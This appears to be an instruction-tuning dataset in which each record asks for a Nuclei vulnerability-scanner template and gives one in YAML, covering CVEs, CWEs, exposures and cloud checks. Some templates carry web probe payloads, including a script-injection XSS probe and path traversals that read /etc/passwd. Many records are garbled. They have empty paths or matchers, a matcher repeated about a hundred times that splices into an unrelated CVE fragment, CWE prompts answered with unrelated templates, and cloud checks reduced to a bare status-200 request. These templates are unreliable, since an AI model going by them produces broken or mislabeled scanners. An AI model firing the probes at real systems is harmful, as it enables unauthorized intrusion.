\"{{BaseURL}}/application.yml\" \n matchers:\n - type: word\n words:\n - \"runtime:\" \n - \"spring:\" \n - \"datasource:\" \n - \"platform:\" \n - \"server:\" \n - \"job:\" \n condition: or\n - type: status\n status:\n - 200\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "application-yaml"} {"instruction": "Generate a Nuclei template for: CakePHP Default Page", "input": "Title: CakePHP Default Page\nSummary: CakePHP Default Page. Tags: tech, cakephp, default-page\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: default-cakephp-page\n\ninfo:\n name: CakePHP Default Page\n author: DhiyaneshDK\n severity: info\n description: CakePHP Default Page\n tags: tech,cakephp,default-page,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Welcome to CakePHP\" \n - \"CakePHP Issues\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "default-cakephp-page"} {"instruction": "Generate a Nuclei template for CVE-2019-10758", "input": "Title: Code Injection in mongo-express_project mongo-express\nSummary: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: mongo-express_project mongo-express\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-10758\n\ninfo:\n name: mongo-express Remote Code Execution\n author: princechaddha\n severity: critical\n description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment.\n tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol", "category": "cve", "severity": "critical", "id": "CVE-2019-10758"} {"instruction": "Generate a Nuclei template for CVE-2014-8739", "input": "Title: Unrestricted File Upload in creative-solutions creative_contact_form and others\nSummary: Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nAffected Products: creative-solutions creative_contact_form, jquery_file_upload_project jquery_file_upload\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-8739\n\ninfo:\n name: WordPress Sexy Contact Form (<= 0.9.7) - Arbitrary File Upload\n author: melmathari\n severity: critical\n description: Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.\n tags: cve,cve2014,wordpress,wp-plugin,wp,sexy-contact-form,intrusive,file-upload,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{marker}}\"", "category": "cve", "severity": "critical", "id": "CVE-2014-8739"} {"instruction": "Generate a Nuclei template for: Platformio Config File Disclosure", "input": "Title: Platformio Config File Disclosure\nSummary: Platformio Config File Disclosure. \u201cplatformio.ini\u201d (Project Configuration File) was detected.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: platformio-ini\n\ninfo:\n name: Platformio Config File Disclosure\n author: DhiyaneshDK\n severity: low\n description: \u201cplatformio.ini\u201d (Project Configuration File) was detected.\n tags: config,exposure,platformio,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/platformio.ini\" \n matchers:\n - type: word\n words:\n - \"[platformio]\" \n - \"platform =\" \n - \"board =\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "platformio-ini"} {"instruction": "Generate a Nuclei template for: ElastiCache Redis Multi-AZ - Disabled", "input": "Title: ElastiCache Redis Multi-AZ - Disabled\nSummary: ElastiCache Redis Multi-AZ - Disabled. Ensure that your Amazon ElastiCache Redis cache clusters are using a Multi-AZ deployment configuration to enhance reliability through automatic failover.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: cache-redis-multiaz-disabled\n\ninfo:\n name: ElastiCache Redis Multi-AZ - Disabled\n author: DhiyaneshDK\n severity: medium\n description: Ensure that your Amazon ElastiCache Redis cache clusters are using a Multi-AZ deployment configuration to enhance reliability through automatic failover.\n tags: cloud,devops,aws,amazon,elasticache,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "cache-redis-multiaz-disabled"} {"instruction": "Generate a Nuclei template for: ScriptCase Panel Detect", "input": "Title: ScriptCase Panel Detect\nSummary: ScriptCase Panel Detect. Tags: panel, scriptcase, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: scriptcase-panel\n\ninfo:\n name: ScriptCase Panel Detect\n author: Ricardo Maia (Brainfork)\n severity: info\n description: ScriptCase Panel Detect\n tags: panel,scriptcase,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/devel/iface/\" \n - \"{{BaseURL}}/scriptcase/devel/iface/\" \n matchers:\n - type: regex\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "scriptcase-panel"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: samsung-wlan-default-login\n\ninfo:\n name: Samsung Wlan AP (WEA453e) Default Login\n author: pikpikcu\n severity: high\n description: Samsung Wlan AP (WEA453e) default root credentials were discovered.\n tags: samsung,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"document.formParent2.changepasswd1.value\" \n - \"passwd_change.ehp\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: Live Helper Chat Detect", "input": "Title: Live Helper Chat Detect\nSummary: Live Helper Chat Detect. Tags: livehelperchat, tech, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: livehelperchat-detect\n\ninfo:\n name: Live Helper Chat Detect\n author: pikpikcu,ricardomaia\n severity: info\n description: Live Helper Chat Detect\n tags: livehelperchat,tech,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/doc/CHANGELOG.txt\" \n - \"{{BaseURL}}/doc/README.txt\" \n matchers:\n - type: regex\n part: body\n - type: regex", "category": "generic", "severity": "info", "id": "livehelperchat-detect"} {"instruction": "Generate a Nuclei template for: OSS Bucket Public Accessible", "input": "Title: OSS Bucket Public Accessible\nSummary: OSS Bucket Public Accessible. Ensure that your Object Storage Service (OSS) buckets are not publicly accessible to the Internet in order to protect against unauthorized access. Allowing public, anonymous access through bucket ACLs and bucket policies gives everyone the ability to access bucket contents.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: oos-bucket-public-access\n\ninfo:\n name: OSS Bucket Public Accessible\n author: DhiyaneshDK\n severity: high\n description: Ensure that your Object Storage Service (OSS) buckets are not publicly accessible to the Internet in order to protect against unauthorized access. Allowing public, anonymous access through bucket ACLs and bucket policies gives everyone the ability to access bucket contents.\n tags: cloud,devops,aliyun,alibaba,aliyun-cloud-config,alibaba-oss\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "oos-bucket-public-access"} {"instruction": "Generate a Nuclei template for: Default IBM HTTP Server", "input": "Title: Default IBM HTTP Server\nSummary: Default IBM HTTP Server. Tags: tech, ibm, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ibm-http-server\n\ninfo:\n name: Default IBM HTTP Server\n author: dhiyaneshDK,pussycat0x\n severity: info\n description: Default IBM HTTP Server\n tags: tech,ibm,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"IBM HTTP Server\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "ibm-http-server"} {"instruction": "Generate a Nuclei template for CVE-2020-20982", "input": "Title: Cross-Site Scripting (XSS) in wdja wdja_cms\nSummary: Cross Site Scripting (XSS) vulnerability in shadoweb wdja v1.5.1, allows attackers to execute arbitrary code and gain escalated privileges, via the backurl parameter to /php/passport/index.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: critical\nAffected Products: wdja wdja_cms\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-20982\n\ninfo:\n name: shadoweb wdja v1.5.1 - Cross-Site Scripting\n author: pikpikcu,ritikchaddha\n severity: critical\n description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.\n tags: cve2020,cve,xss,wdja,shadoweb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"location.href='\" \n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2020-20982"} {"instruction": "Generate a Nuclei template for: Gradio 3.47/3.50.2 - Local File Inclusion", "input": "Title: Gradio 3.47/3.50.2 - Local File Inclusion\nSummary: Gradio 3.47/3.50.2 - Local File Inclusion. Local file read by calling arbitrary methods of Components class between Gradio versions 3.47 / 3.50.2\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: gradio-lfi\n\ninfo:\n name: Gradio 3.47/3.50.2 - Local File Inclusion\n author: nvn1729\n severity: high\n description: Local file read by calling arbitrary methods of Components class between Gradio versions 3.47 / 3.50.2\n tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: or\n - method: GET\n path:\n matchers:\n - type: regex\n part: body_2\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "gradio-lfi"} {"instruction": "Generate a Nuclei template for: putty phishing Detection", "input": "Title: putty phishing Detection\nSummary: putty phishing Detection. A putty phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: putty-phish\n\ninfo:\n name: putty phishing Detection\n author: rxerium\n severity: info\n description: A putty phishing website was detected\n tags: phishing,putty,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Download PuTTY - a free SSH and telnet client for Windows\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "putty-phish"} {"instruction": "Generate a Nuclei template for: Wappalyzer Technology Detection", "input": "Title: Wappalyzer Technology Detection\nSummary: Wappalyzer Technology Detection. Tags: tech, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: tech-detect\n\ninfo:\n name: Wappalyzer Technology Detection\n author: hakluke,righettod\n severity: info\n description: Wappalyzer Technology Detection\n tags: tech,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: body\n condition: or\n - type: word\n words:\n - \"Project Management Software\" \n - \"atlassian.com/software/jira\" \n part: body\n condition: and\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: regex\n part: body\n condition: or\n - type: word\n words:\n - \"=&\"><< Back

    \" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2018-5715"} {"instruction": "Generate a Nuclei template to detect Command Injection", "input": "Title: Command Injection (CWE-77)\nSummary: The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attac\nVulnerability Type: Command Injection\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: hasura-graphql-psql-exec\n\ninfo:\n name: Hasura GraphQL Engine - Remote Code Execution\n author: Udyz\n severity: critical\n description: Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint (aka remote code execution).\n tags: graphql,edb,hasura,rce,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body", "category": "cwe", "severity": "medium", "id": "CWE-77"} {"instruction": "Generate a Nuclei template for: LLMNR Disabled", "input": "Title: LLMNR Disabled\nSummary: LLMNR Disabled. Determine if LLMNR (Link-Local Multicast Name Resolution) is disabled.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: llmnr-disabled\n\ninfo:\n name: LLMNR Disabled\n author: princechaddha\n severity: medium\n description: Determine if LLMNR (Link-Local Multicast Name Resolution) is disabled.\n tags: windows,llmnr,network,security,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "llmnr-disabled"} {"instruction": "Generate a Nuclei template to detect Authentication Bypass Using an Alternate Path or Channel", "input": "Title: Authentication Bypass Using an Alternate Path or Channel (CWE-288)\nSummary: The product requires authentication, but the product has an alternate path or channel that does not require authentication.\nVulnerability Type: Authentication Bypass Using an Alternate Path or Channel\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: jupyter-ipython-unauth\n\ninfo:\n name: Jupyter ipython - Authorization Bypass\n author: pentest_swissky\n severity: critical\n description: Jupyter was able to be accessed without authentication.\n tags: unauth,jupyter,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ipython/tree\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"ipython/static/components\" \n - \"ipython/kernelspecs\" \n part: body", "category": "cwe", "severity": "high", "id": "CWE-288"} {"instruction": "Generate a Nuclei template for: FTP Security Checks", "input": "Title: FTP Security Checks\nSummary: FTP Security Checks. A simple workflow that runs all FTP related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ftp-workflow\n\ninfo:\n name: FTP Security Checks\n author: Mys7ic\n severity: info\n description: A simple workflow that runs all FTP related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "ftp-workflow"} {"instruction": "Generate a Nuclei template for CVE-2022-1392", "input": "Title: Path Traversal in commoninja videos_sync_pdf\nSummary: The Videos sync PDF WordPress plugin through 1.7.4 does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: commoninja videos_sync_pdf\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-1392\n\ninfo:\n name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion\n author: Veshraj\n severity: high\n description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion.\n tags: cve,cve2022,lfi,wp-plugin,unauth,wpscan,packetstorm,wp,wordpress,commoninja,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout\" \n matchers:\n - type: word\n words:\n - \"failed to open stream: No such file or directory\" \n - \"REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-1392"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: promodj\n\ninfo:\n name: Promodj User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Promodj user name information check was conducted.\n tags: osint,osint-music,promodj,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://promodj.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Favorite styles\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-0776", "input": "Title: Cross-Site Scripting (XSS) in revealjs reveal.js\nSummary: Cross-site Scripting (XSS) - DOM in GitHub repository hakimel/reveal.js prior to 4.3.0.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: revealjs reveal.js\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0776\n\ninfo:\n name: RevealJS postMessage <4.3.0 - Cross-Site Scripting\n author: LogicalHunter\n severity: medium\n description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.\n tags: cve,cve2022,hackerone,huntr,headless,postmessage,revealjs,node.js,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-0776"} {"instruction": "Generate a Nuclei template for CVE-2023-39143", "input": "Title: Path Traversal in papercut papercut_mf and others\nSummary: PaperCut NG and PaperCut MF before 22.1.3 on Windows allow path traversal, enabling attackers to upload, read, or delete arbitrary files. This leads to remote code execution when external device integration is enabled (a very common configuration).\nVulnerability Type: Path Traversal\nSeverity: critical\nAffected Products: papercut papercut_mf, papercut papercut_ng\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-39143\n\ninfo:\n name: PaperCut < 22.1.3 - Path Traversal\n author: pdteam\n severity: critical\n description: PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.\n tags: cve2023,cve,lfi,papercut,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-39143"} {"instruction": "Generate a Nuclei template for: Reflected XSS", "input": "Title: Reflected XSS\nSummary: Reflected XSS. Reflected cross-site scripting vulnerability was discovered via generic testing. Manual testing is needed to verify exploitation.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: xss-uri-reflected\n\ninfo:\n name: Reflected XSS\n author: nadino,geeknik,matejsmycka\n severity: low\n description: Reflected cross-site scripting vulnerability was discovered via generic testing. Manual testing is needed to verify exploitation.\n tags: xss,generic,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/a%22%3E%3Cinjectable%3E\" \n - \"{{BaseURL}}/a%27%3E%3Cinjectable%3E\" \n matchers:\n - type: word\n words:\n - \"\">\" \n - \"'>\" \n part: body\n condition: or\n - type: word\n words:\n - \"text/html\" \n part: content_type\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Access Denied\" \n - \"You don't have permission to access\" \n part: body\n condition: or", "category": "generic", "severity": "low", "id": "xss-uri-reflected"} {"instruction": "Generate a Nuclei template for CVE-2016-3510", "input": "Title: Unknown Vulnerability in oracle weblogic_server\nSummary: Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: oracle weblogic_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-3510\n\ninfo:\n name: Oracle WebLogic Server Java Object Deserialization - Remote Code Execution\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.\n tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2016-3510"} {"instruction": "Generate a Nuclei template for: Server Monitor Installer", "input": "Title: Server Monitor Installer\nSummary: Server Monitor Installer. Server Monitor is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: server-monitor-installer\n\ninfo:\n name: Server Monitor Installer\n author: tess\n severity: high\n description: Server Monitor is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,monitor,exposure,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install.php\" \n matchers:\n - type: word\n words:\n - \"SERVER MONITOR - Install\" \n - \"PHP Server Monitor - Install\" \n - \"install.php?action=config\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "server-monitor-installer"} {"instruction": "Generate a Nuclei template for CVE-2018-11138", "input": "Title: OS Command Injection in quest kace_system_management_appliance\nSummary: The '/common/download_agent_installer.php' script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: quest kace_system_management_appliance\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-11138\n\ninfo:\n name: Quest KACE System Management Appliance 8.0.318 - Remote Code Execution\n author: ritikchaddha\n severity: critical\n description: The '/common/download_agent_installer.php' script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system.\n tags: cve,cve2018,quest,kace,rce,kev,passive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2018-11138"} {"instruction": "Generate a Nuclei template for CVE-2021-43287", "input": "Title: Information Disclosure in thoughtworks gocd\nSummary: An issue was discovered in ThoughtWorks GoCD before 21.3.0. The business continuity add-on, which is enabled by default, leaks all secrets known to the GoCD server to unauthenticated attackers.\nVulnerability Type: Information Disclosure\nSeverity: high\nAffected Products: thoughtworks gocd\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-43287\n\ninfo:\n name: Pre-Auth Takeover of Build Pipelines in GoCD\n author: dhiyaneshDk\n severity: high\n description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.\n tags: cve2021,cve,go,lfi,gocd,thoughtworks,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2021-43287"} {"instruction": "Generate a Nuclei template for: Hashicorp API Token", "input": "Title: Hashicorp API Token\nSummary: Hashicorp API Token. Tags: hashicorp, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: hashicorp-token\n\ninfo:\n name: Hashicorp API Token\n author: DhiyaneshDK\n severity: info\n description: Hashicorp API Token\n tags: hashicorp,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "hashicorp-token"} {"instruction": "Generate a Nuclei template for: Azure AKS Kubernetes API Version Not Latest", "input": "Title: Azure AKS Kubernetes API Version Not Latest\nSummary: Azure AKS Kubernetes API Version Not Latest. To maximize the benefits of your Azure Kubernetes Service (AKS) clusters, it is important to ensure they are running on the latest Kubernetes version. By doing so, you gain access to new and improved features, as well as the latest security patches. The Kubernetes API upgrade becomes fully available only after it is approved by Microsoft Azure.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-aks-api-version-not-latest\n\ninfo:\n name: Azure AKS Kubernetes API Version Not Latest\n author: princechaddha\n severity: high\n description: To maximize the benefits of your 